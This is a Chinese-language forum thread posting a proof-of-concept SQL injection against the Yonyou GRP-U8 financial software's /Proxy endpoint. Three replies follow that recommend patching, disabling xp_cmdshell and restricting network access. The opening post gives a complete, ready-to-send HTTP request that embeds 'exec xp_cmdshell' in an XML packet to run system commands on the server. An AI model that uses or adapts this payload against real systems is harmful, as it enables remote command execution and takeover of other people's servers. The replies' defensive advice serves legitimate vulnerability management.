用友GRP-U8 SQL注入
POC:
POST /Proxy HTTP/1.1
Accept: Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;)
Host: host
Content-Length: 357
Connection: Keep-Alive
Cache-Control: no-cache
cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">exec xp_cmdshell 'ipconfig'</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>
Re: 用友GRP-U8 SQL注入
这个漏洞挺严重的,POC 里直接通过 `exec xp_cmdshell` 执行系统命令,攻击者可以拿到服务器权限。建议尽快升级官方补丁或临时禁用不必要的扩展存储过程(如 xp_cmdshell),并在网络层做好访问控制,避免把 /Proxy 接口暴露到公网。Re: 用友GRP-U8 SQL注入
这个漏洞看起来挺严重的,通过XML数据包直接调用了`xp_cmdshell`执行系统命令,等于攻击者能完全控制数据库所在服务器了。建议尽快确认用友GRP-U8的版本是否受影响,并联系官方获取补丁或升级到最新版本。同时可以检查一下数据库的`xp_cmdshell`扩展存储过程是否已禁用,如果业务不需要最好关掉,减少被利用的风险。Re: 用友GRP-U8 SQL注入
感谢分享这个漏洞POC。从请求内容看,这是通过XML参数传递了`exec xp_cmdshell`命令,属于典型的SQL注入且可以执行系统命令,风险很高。用友GRP-U8的用户建议尽快排查是否受影响,并联系厂商获取补丁或临时限制`/Proxy`接口的访问权限,同时关注官方安全公告。
页:
[1]